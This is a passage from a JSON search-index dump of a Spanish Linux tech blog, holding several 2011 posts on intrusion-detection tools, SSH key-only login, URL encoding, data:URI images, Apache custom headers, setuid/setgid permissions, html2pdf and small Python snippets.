20:40\u0026gt; Performing rootkit checks... 20:41\u0026gt; Performing system specific checks... 20:44\u0026gt; Performing root directory checks... 20:44\u0026gt; Checking for secure backup devices... 20:44\u0026gt; Checking for the presence of log files... 20:44\u0026gt; Checking for the setting of user\u0026#39;s umask... 20:44\u0026gt; Checking for listening processes... 20:44\u0026gt; Checking SSHD\u0026#39;s configuration... 20:44\u0026gt; Checking the printers control file... 20:44\u0026gt; Checking ftpusers configuration... 20:44\u0026gt; Checking NTP configuration... 20:44\u0026gt; Waiting for filesystems scans to complete... 20:44\u0026gt; Filesystems scans completed... 20:44\u0026gt; Performing check of embedded pathnames... 20:45\u0026gt; Security report completed for terminus. Security report is in `/var/log/tiger/security.report.terminus.110307-20:38\u0026#39;. Para evitar el aviso:\n–CONFIG– [con010c] Filesystem \u0026#39;devtmpfs\u0026#39; used by \u0026#39;none\u0026#39; is not recognised as a valid filesystem editamos el fichero de configuración, /etc/tiger/tigerrc, y añadimos el sitema de ficheros devtmpfs como válido. Para esto buscamos la clave Tiger_FSScan_Local y la modificamos:\nTiger_FSScan_Local=\u0026#39;devtmpfs\u0026#39; logwatch logwatch analiza los logs del sistema y nos envía un repote de las áreas a analizar que le especifiquemos. Se ejecuta diariamente. Podemos configurar el correo al que envía los reportes dándole un valor a la variable de entorno MAILTO. Añadimos la siguiente línea al fichero /etc/bash.bashrc:\nMAILTO=user@localhost Para probar el funcionamiento ejecutamos:\n$ /usr/sbin/logwatch --debug 10 logcheck logcheck, otro analizador de logs. Es posible que empecemos a recibir demasiados mensajes debido a la sincronización de ntp, pero podemos configurarlo para que los ignore. El fichero de configuración está en /etc/logcheck/logcheck.conf.\n1 Podemos encontrar una lista de los servicios más comunes en el fichero /etc/services.\n","permalink":"http://karpoke.ignaciocano.com/2011/03/07/detectando-intrusos-en-ubuntu-maverick-meerkat/","summary":"\u003cp\u003eUn artículo para tener en cuenta algunas de las acciones que podemos\nllevar a cabo para \u003ca href=\"http://dzulkifli.com/index.php?option=com_content\u0026amp;view=article\u0026amp;id=109:securing-maverick-meerkat\u0026amp;catid=35:ubuntu\u0026amp;Itemid=85\"\u003esecurizar Ubuntu Maverick Meerkat\u003c/a\u003e. Algunos\nprogramas para facilitar la tarea de controlar los intentos de acceso al\nsistema:\u003c/p\u003e\n\u003ch2 id=\"ufw\"\u003eufw\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eufw\u003c/code\u003e es una forma sencilla de manejar un cortafuegos. Nada más\ninstalarlo, lo habilitamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo ufw enable\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eDamos de alta los servicios^\u003ca href=\"#servicios\"\u003e1\u003c/a\u003e^ que queremos que estén disponibles:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo ufw allow http\n$ sudo ufw allow https\n$ sudo ufw allow 1234\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi queremos deshacer alguna de estas acciones, por ejemplo, eliminar la\nregla para el puerto 1234:\u003c/p\u003e","title":"Detectando intrusos en Ubuntu Maverick Meerkat"},{"content":"Mediante esquema data:URI se pueden incluir imágenes codificadas en base64 en el CSS de una página o en el src de una etiqueta img como si fueran fuentes externas. También se pueden introducir otro tipo de datos, como por ejemplo, código HTML.\n\u0026lt;img src=\u0026#34;data:image/png;base64,iVBORw0KGgo[...]QmCC\u0026#34; title=\u0026#34;image\u0026#34; alt=\u0026#34;image\u0026#34; /\u0026gt; También se puede utilizar en un JSON:\n{ \u0026#34;image\u0026#34;:{ \u0026#34;data_uri\u0026#34;:\u0026#34;data:image/png;base64,iVBORw0KGgo[...]QmCC\u0026#34; } } Las ventajas de utilizar este método son que no se necesitan abrir conexiones adicionales para decargar los datos, ya que toda la información está incluida en el propio archivo, con lo que dejan recursos disponibles, algo que puede ser especialmente útil en redes inalámbricas muy saturadas o lentas, como algunas redes de telefonía móvil, y se crean menos entradas en la caché del navegador. Además, al estar incluidos en el código se pueden cachear.\nEntre los incovenientes, se necesita procesar la imagen para poder incluirla, los datos codificados en base 64 son hasta un 33% más grandes, si los datos se utilizan más de una vez en el mismo documento, deben ser incluidos cada vez, por lo que no se aprovecha la caché del navegador, la URL tiene un máximo relativamente pequeño y diferente para cada navegador y, por último, aunque los navegadores más populares lo soporten, no\nCodificar la imagen Para codificar una imagen podemos utilizar el comando base64. El argumento -w0 es para que devuelva el resultado en una sola línea:\n$ base64 -w0 img.png \u0026gt; img.b64 Sin embargo, este formato no es apropiado para URL, ya que contiene caracteres como +, / o =, por lo que codificaremos la salida del comando anterior para que lo sea:\n$ alias urlenc=\u0026#39;furlenc() { perl -MURI::Escape -e \u0026#34;print uri_escape(\\\u0026#34;$1\\\u0026#34;).\\\u0026#34;\\n\\\u0026#34;;\u0026#34;; }; furlenc\u0026#39; $ urlenc $(base64 -w0 img.png) \u0026gt; img.b64 Decodificar una imagen Para realizar el paso inverso, obtener la imagen a partir del código en la página, guardaremos en un fichero, por ejemplo img.b64, el código en base64 referente a la imagen:\nalias urldec=\u0026#39;furldec() { echo \u0026#34;$1\u0026#34; | sed -e\u0026#39;\\\u0026#39;\u0026#39;s/%\\([0-9A-F][0-9A-F]\\)/\\\\\\\\\\x\\1/g\u0026#39;\\\u0026#39;\u0026#39; | xargs echo -e; }; furldec\u0026#39; $ urldec $(cat img.b64) | base64 -d \u0026gt; img.png ","permalink":"http://karpoke.ignaciocano.com/2011/03/06/imagenes-embebidas-en-el-codigo-html-css-o-json/","summary":"\u003cp\u003eMediante esquema \u003ccode\u003edata:URI\u003c/code\u003e se pueden \u003ca href=\"http://mark.koli.ch/2009/07/howto-include-binary-image-data-in-cascading-style-sheets-css.html\"\u003eincluir imágenes codificadas\u003c/a\u003e\nen \u003ccode\u003ebase64\u003c/code\u003e en el CSS de una página o en el \u003ccode\u003esrc\u003c/code\u003e de una etiqueta \u003ccode\u003eimg\u003c/code\u003e\ncomo si fueran fuentes externas. También se pueden introducir otro tipo\nde datos, como por ejemplo, código HTML.\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;img src=\u0026#34;data:image/png;base64,iVBORw0KGgo[...]QmCC\u0026#34; title=\u0026#34;image\u0026#34; alt=\u0026#34;image\u0026#34; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eTambién se puede utilizar en un \u003ca href=\"http://mark.koli.ch/2011/01/more-fun-with-rfc-2397----the-data-url-scheme.html\"\u003eJSON\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e{\n \u0026#34;image\u0026#34;:{\n  \u0026#34;data_uri\u0026#34;:\u0026#34;data:image/png;base64,iVBORw0KGgo[...]QmCC\u0026#34;\n }\n}\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Google 404\" loading=\"lazy\" src=\"/images/google-404-300x112.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLas ventajas de utilizar este método son que no se necesitan abrir\nconexiones adicionales para decargar los datos, ya que toda la\ninformación está incluida en el propio archivo, con lo que dejan\nrecursos disponibles, algo que puede ser especialmente útil en redes\ninalámbricas muy saturadas o lentas, como algunas redes de telefonía\nmóvil, y se crean menos entradas en la caché del navegador. Además, al\nestar incluidos en el código se pueden cachear.\u003c/p\u003e","title":"Imágenes embebidas en el código HTML, CSS o JSON"},{"content":"Los siguientes caracteres son los únicos que se pueden utilizar en una URL:\n[a-zA-Z0-9-._~] El resto, se deben codificar usando el prefijo % seguido del valor ASCII hexadecimal del carácter. Por ejemplo:\n( = %28 ) = %29 / = %2F + = %2B ... Para codificar la URL podemos utilizar la función uri_escape del módulo URI de Perl.\nalias urlenc=\u0026#39;furlenc() { perl -MURI::Escape -e \u0026#34;print uri_escape(\\\u0026#34;$1\\\u0026#34;).\\\u0026#34;\\n\\\u0026#34;;\u0026#34;; }; furlenc\u0026#39; $ urlenc http://www.google.com http%3A%2F%2Fwww.google.com Para la decodificación de la URL, podemos hacer uso de sed:\nalias urldec=\u0026#39;furldec() { echo \u0026#34;$1\u0026#34; | sed -e\u0026#39;\\\u0026#39;\u0026#39;s/%\\([0-9A-F][0-9A-F]\\)/\\\\\\\\\\x\\1/g\u0026#39;\\\u0026#39;\u0026#39; | xargs echo -e; }; furldec\u0026#39; $ urldec http%3A%2F%2Fwww.google.com http://www.google.com ","permalink":"http://karpoke.ignaciocano.com/2011/03/06/urlencode-y-urldecode/","summary":"\u003cp\u003eLos siguientes caracteres \u003ca href=\"http://tools.ietf.org/html/rfc3986#section-2.3\"\u003eson los únicos que se pueden utilizar\u003c/a\u003e en\nuna URL:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e[a-zA-Z0-9-._~]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl resto, se deben codificar usando el prefijo \u003ccode\u003e%\u003c/code\u003e seguido del valor\nASCII hexadecimal del carácter. Por ejemplo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e( = %28\n) = %29\n/ = %2F\n+ = %2B\n...\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara \u003ca href=\"http://stackoverflow.com/questions/296536/urlencode-from-a-bash-script/298258#298258\"\u003ecodificar la URL\u003c/a\u003e podemos utilizar la función \u003ccode\u003euri_escape\u003c/code\u003e del\nmódulo \u003ccode\u003eURI\u003c/code\u003e de Perl.\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ealias urlenc=\u0026#39;furlenc() { perl -MURI::Escape -e \u0026#34;print uri_escape(\\\u0026#34;$1\\\u0026#34;).\\\u0026#34;\\n\\\u0026#34;;\u0026#34;; }; furlenc\u0026#39;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ urlenc http://www.google.com\nhttp%3A%2F%2Fwww.google.com\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara la \u003ca href=\"http://www.commandlinefu.com/commands/view/2285/urldecoding\"\u003edecodificación de la URL\u003c/a\u003e, podemos hacer uso de \u003ccode\u003esed\u003c/code\u003e:\u003c/p\u003e","title":"urlencode y urldecode"},{"content":"La nueva versión del plugin de Adobe borra los archivos termporales de vídeo justo después de abrirlos para evitar que tengamos la tentación de copiar el vídeo simplemente copiando el archivo /tmp/FlashXXXX. hons, un usuario de commandlinefu.com ha publicado un comando que crea un enlace simbólico al controlador del archivo con el nombre del archivo borrado:\n$ for h in $(find /proc/_/fd -ilname \u0026#34;/tmp/Flash_\u0026#34; 2\u0026gt;/dev/null); do \u0026gt; ln -s \u0026#34;$h\u0026#34; $(readlink \u0026#34;$h\u0026#34; | cut -d\u0026#39; \u0026#39; -f1); \u0026gt; done Vamos a probarlo con un vídeo cualquiera, por ejemplo este: IT Crowd - Fire.\nCon find podemos encontrar estos archivos borrados:\n$ find /proc/_/fd -ilname \u0026#34;/tmp/Flash_\u0026#34; 2\u0026gt;/dev/null /proc/21204/fd/36 y con readlink podemos saber el nombre que tenían.\n$ readlink /proc/21204/fd/36 /tmp/FlashXX3Jmbxp (deleted) Tras ejecutar el comando, tendremos un enlace como el siguiente:\n$ ls -nl /tmp/Flash* lrwxrwxrwx 1 1000 1000 17 2011-03-04 17:42 FlashXX3Jmbxp -\u0026gt; /proc/21204/fd/36 Para copiarlo basta hacer:\n$ cp /tmp/FlashXX3Jmbxp ~/it-crowd-fire.flv Actualizado el 22 de marzo de 2012 Actualmente, parece que esto ya no funciona. Los vídeos ya no se guardan en en el directorio /tmp. Sin embargo, es posible que podamos encontrar el vídeo en la caché del navegador.\nEn Firefox, la caché se encuentra en ~/.mozilla/firefox/userprofile/Cache, donde userprofile es algo como lwx2hgoq.default.\nPara encontrar los archivos que sean vídeos Flash, podemos ejecutar algo como esto para encontrarlos:\n$ find . -type f -exec file {} \\; | grep -i flash | grep -iv compressed | awk -F: \u0026#39;{print $1}\u0026#39; ./2/2F/929B0d01 ./E/B3/307B6d01 ./C/B5/E5137d01 ./3/86/C1069d01 ./D/7B/DFE3Dd01 ./F/42/414E2d01 Excluyo los archivos compressed porque no he podido abrirlos con ningún programa. Al intentarlo, devolvía un error de Compressed SWF format not supported.\nEn Chromium la caché se guarda en ~/.cache/chromium/Cache.\n","permalink":"http://karpoke.ignaciocano.com/2011/03/04/recuperando-los-videos-flash-borrados-por-el-plugin-de-adobe/","summary":"\u003cp\u003eLa nueva versión del plugin de Adobe borra los archivos termporales de\nvídeo justo después de abrirlos para evitar que tengamos la tentación de\ncopiar el vídeo simplemente copiando el archivo \u003ccode\u003e/tmp/FlashXXXX\u003c/code\u003e.\n\u003ccode\u003ehons\u003c/code\u003e, un \u003ca href=\"http://www.commandlinefu.com/commands/view/7991/recover-tmp-flash-videos-deleted-immediately-by-the-browser-plugin\"\u003eusuario de commandlinefu.com\u003c/a\u003e ha publicado un comando que\ncrea un enlace simbólico al controlador del archivo con el nombre del\narchivo borrado:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for h in $(find /proc/_/fd -ilname \u0026#34;/tmp/Flash_\u0026#34; 2\u0026gt;/dev/null); do\n\u0026gt;    ln -s \u0026#34;$h\u0026#34; $(readlink \u0026#34;$h\u0026#34; | cut -d\u0026#39; \u0026#39; -f1);\n\u0026gt; done\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Youtbe targeted\" loading=\"lazy\" src=\"/images/youtube-targeted-298x300.jpg\"\u003e\u003c/p\u003e","title":"Recuperando los vídeos Flash borrados por el plugin de Adobe"},{"content":"Conectarnos a nuestro servidor de SSH utilizando una clave RSA en lugar de una contraseña es más seguro, dado que la clave RSA será bastante más larga y difícil de comprometer que nuestra contraseña, y más cómodo, dado que ya no tendremos que escribir la contraseña para iniciar sesión.\nConfiguración En el equipo local, creamos la clave. Cuando nos pida contraseña, le asignamos una, que nos será requerida cada vez que queramos usar dicha clave. Si estuviéramos creando las claves en el servidor la dejaríamos en blanco.\n$ ssh-keygen -b 4096 -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/username/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/username/.ssh/id_rsa. Your public key has been saved in /home/username/.ssh/id_rsa.pub. The key fingerprint is: b5:51:c4:64:51:d6:d5:98:38:a6:0d:f1:ae:25:10:fb username@host The key\u0026#39;s randomart image is: +--[ RSA 4096]----+ | ==*o+.| | =oO . .| | =.o* o | | . . oo | | . o S .. | | E o . . | | . . . | | . . | | | +-----------------+ La copiamos al servidor:\n$ ssh-copy-id username@remotehost username@remotehost\u0026#39;s password: Now try logging into the machine, with \u0026#34;ssh \u0026#39;username@remotehost\u0026#39;\u0026#34;, and check in: .ssh/authorized_keys to make sure we haven\u0026#39;t added extra keys that you weren\u0026#39;t expecting. Si tenemos SSH corriendo en un puerto distinto, deberemos incluirlo todo entre comillas simples, algo como:\n$ ssh-copy-id \u0026#39;-p1234 username@remotehost\u0026#39; Hacemos lo que nos sugiere, y nos conectamos al servidor para comprobar que en el fichero ~/.ssh/authorized_keys están únicamente las claves que hemos autorizado nosotros:\n$ ssh username@remotehost Fuente: openssh.com\nEn el servidor, editamos el fichero /etc/ssh/sshd_config y nos aseguramos de que:\nPubkeyAuthentication yes PasswordAuthentication no AllowUsers username Reiniciamos el servicio ssh y listos:\n$ sudo service ssh restart Si nos intentamos conectar desde un ordenador el cual no contiene la clave, o con un usuario para el cual no está permitido el acceso:\nother@otherhost:~$ ssh user@remotehost Permission denied (publickey). Cambiar o eliminar la frase de paso de la clave privada Si habíamos introducido una contraseña para usar la clave al crearla y más tarde queremos cambiarla o eliminarla, por ejemplo, para conectarnos por ssh en un script:\n$ ssh-keygen -p -f ~/.ssh/id_rsa Enter old passphrase: Key has comment \u0026#39;/home/unsername/.ssh/id_rsa\u0026#39; Enter new passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved with the new passphrase. Si hemos dejado en blanco el campo para la nueva contraseña, ya no nos la pedirá al conectarnos.\nPermitir que otro usuario se conecte usando sólo la clave Para que nos podamos conectar al servidor de la misma manera pero desde otro equipo, deberemos seguir los mismos pasos descritos arriba, pero antes, deberemos volver a permitir la autenticación con contraseña, ya que de lo contrario el nuevo usuario no podrá copiar su clave al servidor.\nNos conectamos al servidor con el usuario que con el que ya tenemos acceso y editamos el fichero /etc/ssh/sshd_config:\nPasswordAuthentication yes Si el nuevo usuario se conecta al servidor con un usuario distinto al de antes, deberemos añadirlo a la lista de usuarios permitidos:\nAllowUser username otherusername Reiniciamos el servicio:\n$ sudo service ssh restart En el nuevo equipo, seguimos los pasos descritos arriba para crear la clave y copiarla al servidor.\n$ ssh-keygen -b 4096 -t rsa Una vez copiada, podemos probar de conectarnos:\n$ ssh otherusername@remotehost $ ssh-copy-id otherusername@remotehost $ ssh otherusername@remotehost Si todo ha ido bien, y nos hemos conectado al servidor con el nuevo usuario, ya podemos deshabilitar la autenticación por contraseña, en el fichero /etc/ssh/sshd_config:\nPasswordAuthentication no Y volvemos a reiniciar el servicio:\n$ sudo service ssh restart ","permalink":"http://karpoke.ignaciocano.com/2011/03/03/conectarse-por-ssh-solo-usando-la-clave/","summary":"\u003cp\u003eConectarnos a nuestro servidor de SSH utilizando una clave RSA en lugar\nde una contraseña es más seguro, dado que la clave RSA será bastante más\nlarga y difícil de comprometer que nuestra contraseña, y más cómodo,\ndado que ya no tendremos que escribir la contraseña para iniciar sesión.\u003c/p\u003e\n\u003ch2 id=\"configuración\"\u003eConfiguración\u003c/h2\u003e\n\u003cp\u003eEn el equipo local, creamos la clave. Cuando nos pida contraseña, le\nasignamos una, que nos será requerida cada vez que queramos usar dicha\nclave. Si estuviéramos creando las claves en el servidor la \u003ca href=\"http://marc.info/?l=secure-shell\u0026amp;m=91703263608458\u0026amp;w=2\"\u003edejaríamos\nen blanco\u003c/a\u003e.\u003c/p\u003e","title":"Conectarse por SSH sólo usando la clave"},{"content":"Podemos modificar las cabeceras que devuelve el Apache usando el módulo mod_headers. Por ejemplo, añadiendo a nuestro virtualhost:\nHeader set X-MyHeader \u0026#34;It took %D microseconds to serve this page.\u0026#34; Se pueden modificar tanto las cabeceras que van a ser enviadas, con la directiva Header, como las que vienen con una petición, con la directiva RequestHeader. Las acciones que se pueden llevar a cabo son:\nset, especifica el valor de la cabecera, la crea si no existía o la modifica en caso contrario append, añade el valor al final de la cabecera existente, y separa los valores por comas add, añade una cabecera, duplicando la cabecera si ésta ya existía unset, elimina una cabecera echo, sólo en el caso de la directiva Header, y permite utilizar el valor de una cabecera en el `request` Este es el resultado:\n$ curl -I localhost HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 18:01:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 X-MyHeader: It took D=632 microsecons to serve this page. Vary: Accept-Encoding Content-Type: text/html Hay algunas páginas web que incluyen cabeceras no estándar, como la mostrada arriba, tales como:\n$ curl -I http://ww.barrapunto.com ... X-Bender: Hey Fry, I’m steering with my ass! $ curl -I wordpress.com ... X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-nananana: Batcache Actualizado el 10 de febrero de 2015 Una cabecera que nos puede resultar interesante añadir es la de X-Robots-Tag, por ejemplo para evitar que los buscadores indexen el contenido del fichero robots.txt:\nHeader set X-Robots-Tag \u0026#34;noindex\u0026#34; En esta página, podemos encontrar las especificaciones de esta cabecera.\n","permalink":"http://karpoke.ignaciocano.com/2011/02/28/cabeceras-http-personalizadas-en-apache2/","summary":"\u003cp\u003ePodemos modificar las cabeceras que devuelve el Apache usando el módulo\n\u003ccode\u003emod_headers\u003c/code\u003e. Por ejemplo, añadiendo a nuestro \u003cem\u003evirtualhost\u003c/em\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eHeader set X-MyHeader \u0026#34;It took %D microseconds to serve this page.\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSe pueden modificar tanto las cabeceras que van a ser enviadas, con la\ndirectiva \u003ccode\u003eHeader\u003c/code\u003e, como las que vienen con una petición, con la\ndirectiva \u003ccode\u003eRequestHeader\u003c/code\u003e. Las acciones que se pueden llevar a cabo son:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eset\u003c/code\u003e, especifica el valor de la cabecera, la crea si no existía o\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ela modifica en caso contrario\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eappend\u003c/code\u003e, añade el valor al final de la cabecera existente, y separa\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003elos valores por comas\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eadd\u003c/code\u003e, añade una cabecera, duplicando la cabecera si ésta ya existía\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eunset\u003c/code\u003e, elimina una cabecera\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eecho\u003c/code\u003e, sólo en el caso de la directiva \u003ccode\u003eHeader\u003c/code\u003e, y permite utilizar\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eel valor de una cabecera en el `request`\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEste es el resultado:\u003c/p\u003e","title":"Cabeceras HTTP personalizadas en Apache2"},{"content":"setuid y setgid son unos permisos especiales, también llamados los sticky bits, que se les pueden asignar a los programas ejecutables para que se ejecuten con los permisos del propietario y no del usuario que los ejecuta. Esto sirve para, por ejemplo, que cualquier usuario ejecute el comando ping aunque éste necesite privilegios de administrador, que es el propietario. En GNU/Linux, y en Unix, estos bits se ignoran cuando se aplican a directorios.\nEjecutar un comando como si fuésemos otro usuario, especialmente como si fuésemos el administrador, suena peligroso\u0026hellip; para el administrador. El problema viene porque si uno de éstos programas sufre un buffer overflow, el usuario podría ejecutar código arbitrario con privilegios de administrador.\nPara cambiar estos permisos con chmod debemos utilizar el byte alto. El valor en octal que debemos usar es 4 para el setuid y 2 para el setgid. Si queremos poner los dos utilizaremos el 6.\nPor ejemplo, activar el setuid (4) y darle permisos de ejecución, lectura y escritura para el propietario (7), y sólo de lectura para el grupo y el resto (4) sería:\n$ chmod 4744 myelf Si sólo quisiéramos cambiarle los permisos a un archivo para que tenga alguno de estos bits activados:\n$ chmod u+s myelf $ chmod g+s myelf $ chmod ug+s myelf Para quitárselos:\n$ chmod u-s myelf $ chmod g-s myelf $ chmod ug-s myelf Para mostrar los archivos con setuid o setgid que hay en el sistema, accesibles para el usuario con el que estamos, evitando mostrar los avisos de que no tenemos permisos de entrar en según qué direcctorios, ejecutamos:\n$ find / -type f \\( -perm -4000 -o -perm -2000 \\) -print 2\u0026gt;/dev/null 1\u0026gt;stickybit.txt \u0026amp; $ tail -f stickybit.txt /bin/mount /bin/fusermount /bin/su /bin/umount /bin/ping6 /bin/ping ... En la Wikipedia, podemos ver un pequeño programa en C que nos muestra esta diferencia entre el uid del usuario y del propietario:\n#include \u0026lt;sys/types.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; int main(void) { printf( \u0026#34;Real UID = %d\\n\u0026#34; \u0026#34;Effective UID = %d\\n\u0026#34; \u0026#34;Real GID = %d\\n\u0026#34; \u0026#34;Effective GID = %d\\n\u0026#34;, getuid (), geteuid(), getgid (), getegid() ); return 0; } Vamos a probarlo. El código de este programa está en el archivo printid.c:\n$ id -u 1000 $ sudo id -u 0 $ sudo gcc -Wall printid.c -o printid $ sudo chmod ug+s printid $ ls -l printid -rwsr-sr-x 1 root root 7249 2011-02-28 13:17 printid $ ./printid Real UID = 1000 Effective UID = 0 Real GID = 1000 Effective GID = 0 ","permalink":"http://karpoke.ignaciocano.com/2011/02/28/setuid-y-setgid/","summary":"\u003cp\u003e\u003ccode\u003esetuid\u003c/code\u003e y \u003ccode\u003esetgid\u003c/code\u003e son unos permisos especiales, también llamados los\n\u003cem\u003esticky bits\u003c/em\u003e, que se les pueden asignar a los programas ejecutables\npara que se ejecuten con los permisos del propietario y no del usuario\nque los ejecuta. Esto sirve para, por ejemplo, que cualquier usuario\nejecute el comando \u003ccode\u003eping\u003c/code\u003e aunque éste necesite privilegios de\nadministrador, que es el propietario. En GNU/Linux, y en Unix, estos\nbits se ignoran cuando se aplican a directorios.\u003c/p\u003e","title":"setuid y setgid"},{"content":"Un buen comando para convertir una web a PDF, idóneo para sitios con documentación pero que ésta sólo está disponible online. Por ejemplo:\n$ html2ps -W b http://www.vala-project.org/doc/vala/ | ps2pdf - out.pdf Con la opción -W b le decimos a html2ps que siga sólo los enlaces que están en el mismo directorio, o a partir de él, respecto a la ruta proporcionada.\nFuente: techpin.com\nPodemos crear un alias que reciba dos parámetros, la URL y el nombre que queremos ponerle al PDF:\n$ alias html2pdf=\u0026#39;fhtml2pdf() { html2ps -W a \u0026#34;$1\u0026#34; | ps2pdf - \u0026#34;$2\u0026#34;; }; fhtml2pdf\u0026#39; $ html2pdf http://www.vala-project.org/doc/vala/ vala-doc.pdf ","permalink":"http://karpoke.ignaciocano.com/2011/02/28/html2pdf-html2ps-ps2pdf/","summary":"\u003cp\u003eUn buen comando para \u003ca href=\"http://www.atareao.es/ubuntu/conociendo-ubuntu/convetir-un-sitio-web-a-pdf-en-ubuntu/\"\u003econvertir una web a PDF\u003c/a\u003e, idóneo para sitios con\ndocumentación pero que ésta sólo está disponible \u003cem\u003eonline\u003c/em\u003e. Por ejemplo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ html2ps -W b http://www.vala-project.org/doc/vala/ | ps2pdf - out.pdf\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCon la opción \u003ccode\u003e-W b\u003c/code\u003e le decimos a \u003ccode\u003ehtml2ps\u003c/code\u003e que siga sólo los enlaces\nque están en el mismo directorio, o a partir de él,\nrespecto a la ruta proporcionada.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Cool HTML Codes\" loading=\"lazy\" src=\"/images/cool-html-codes-300x225.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://www.techpin.com/\"\u003etechpin.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003ePodemos crear un alias que reciba dos parámetros, la URL y el nombre que\nqueremos ponerle al PDF:\u003c/p\u003e","title":"html2pdf = html2ps + ps2pdf"},{"content":"Casi parece que está escrito en chino, o mejor dicho en brainfuck, o puede que no sea muy zen, pero no deja de ser elegante.\ndef mystery(n): a = list(range(n)) [[(yield i) for a[::i] in [([0]*n)[::i]]] for i in a[2:] if a[i]] El nombre de la función pretende no dar pistas para que intentemos averiguar qué hace exactamente esta función. He aquí una pista:\nFuente: numberspiral.com\n\u0026gt;\u0026gt;\u0026gt; f = mystery(20) \u0026gt;\u0026gt;\u0026gt; try: ... while True: ... print f.next() ... except StopIteration: ... pass 2 3 5 7 11 13 17 19 ","permalink":"http://karpoke.ignaciocano.com/2011/02/26/mystery/","summary":"\u003cp\u003eCasi parece que está escrito en chino, o mejor dicho en \u003cem\u003ebrainfuck\u003c/em\u003e, o\npuede que no sea muy \u003cem\u003e\u003ca href=\"/2011/02/26/python-zen/\"\u003ezen\u003c/a\u003e\u003c/em\u003e, pero no deja de ser \u003cem\u003e\u003ca href=\"http://blog.garlicsim.org/post/3504711416#comment-156082460\"\u003eelegante\u003c/a\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edef mystery(n):\n    a = list(range(n))\n    [[(yield i) for a[::i] in [([0]*n)[::i]]] for i in a[2:] if a[i]]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl nombre de la función pretende no dar pistas para que intentemos\naveriguar qué hace exactamente esta función. He aquí una pista:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"prime numnbers\" loading=\"lazy\" src=\"/images/prime-numbers-300x300.gif\" title=\"prime-numbers\"\u003e\u003c/p\u003e\n\u003cp\u003eFuente: \u003ca href=\"http://www.numberspiral.com/\"\u003enumberspiral.com\u003c/a\u003e\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026gt;\u0026gt;\u0026gt; f = mystery(20)\n\u0026gt;\u0026gt;\u0026gt; try:\n...     while True:\n...         print f.next()\n... except StopIteration:\n...     pass\n2\n3\n5\n7\n11\n13\n17\n19\n\u003c/code\u003e\u003c/pre\u003e","title":"Mystery"},{"content":"Just to keep in mind\u0026hellip;\nAuthor: euart\n\u0026gt;\u0026gt;\u0026gt; import this The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren\u0026#39;t special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one-- and preferably only one --obvious way to do it. Although that way may not be obvious at first unless you\u0026#39;re Dutch. Now is better than never. Although never is often better than _right_ now. If the implementation is hard to explain, it\u0026#39;s a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea -- let\u0026#39;s do more of those! ","permalink":"http://karpoke.ignaciocano.com/2011/02/26/python-zen/","summary":"\u003cp\u003e\u003cem\u003eJust to 